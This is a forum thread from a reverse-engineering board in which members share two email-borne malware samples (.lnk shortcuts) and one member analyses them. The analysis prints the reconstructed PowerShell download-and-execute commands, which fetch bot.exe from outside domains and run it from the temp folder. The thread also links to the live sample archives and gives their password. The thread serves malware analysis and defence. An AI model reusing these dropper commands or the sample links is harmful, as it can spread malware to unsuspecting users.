EvilZone
Hacking and Security => Reverse Engineering => : Deque January 25, 2016, 01:35:58 PM
-
Both samples are from the same malware family and arrived via email attachment. Typical file names are Dokument_8979121242.doc.lnk or DHL_id_162723593211.doc.lnk.
Feel free to analyse them and tell us anything you found out.
These archives contain live malware!
7f5a31266205a20b4e1248b4b62b0cf7471c8c2f64159f3c50846e5fffbd9e9a.zip (http://upload.evilzone.org?page=download&file=hrNDj7QAkfNYg9C3ytAl36k5EiKKjZ65VcQgOdgOrYq8ogPXHe)
55e81b0dfa1fd8e841f57b2b64e153cf2e93bed58dac2eaa7c81436ff250f56e.zip (http://upload.evilzone.org?page=download&file=7P33BT05wEZRXDwgaj3aU62mphVSJm9stxZxfyv88KenMTes9L)
The password is "infected".
-
Analysis for file 7f5a*.lnk
Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Sun, 25 Oct 2015 20:40:10 GMT
Last Modified Date: Sun, 25 Oct 2015 20:40:10 GMT
Comments:
The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and pass arguments to it to download a file and save it in the temp folder as a.exe and followed by running the newly saved application. The file tries to download a file from the url hxxp :// goodvin77787.in/bot . exe, now taking into consideration the extension, it appears to be a PE file but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:-
(new-object System.Net.WebClient).DownloadFile('http://goodvin77787.in/bot.exe','%TEMP%\a.exe');Start-Process "%TEMP%\a.exe
Moreover the process window show command value was found to be: SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process a.exe is iconified and the icon is taken from SHELL32.DLL, and the Icon index being 54 and the dimension being 24x24.
Analysis for file 55e8*.lnk
Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Thu, 29 Oct 2015 04:37:08 GMT
Last Modified Date: Thu, 29 Oct 2015 04:37:08 GMT
Comments:
The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and pass arguments to it to download a file and save it in the temp folder as z.exe and followed by running the newly saved application. The file tries to download a file from the url hxxp :// goodprice28.pw/bot . exe, now taking into consideration the extension, it appears to be a PE file but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:-
(new-object System.Net.WebClient).DownloadFile('http://goodprice28.pw/bot.exe','%TEMP%\z.exe');Start-Process "%TEMP%\z.exe
Moreover the process window show command value was found to be: SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process z.exe is iconified and the icon is taken from SHELL32.DLL, and the Icon index being 70 and the dimension being 24x24.
I am not writing any specific conclusion since I am not able to directly examine the bot.exe files and see their effect. I hope this much is fine. Let me know where I messed up, I wold also like to know if anything specific can be deduced from SID that is present in both files.
Edit: Made malicious links unclickable -Deque
-
This is a very detailed analysis. I couldn't have done it better.
PS: Please disarm any malware download links in the future. Even if they are not working anymore. ;)
-
This is a very detailed analysis. I couldn't have done it better.
PS: Please disarm any malware download links in the future. Even if they are not working anymore. ;)
Thanks. Sorry about the links, I will remember it from now onwards.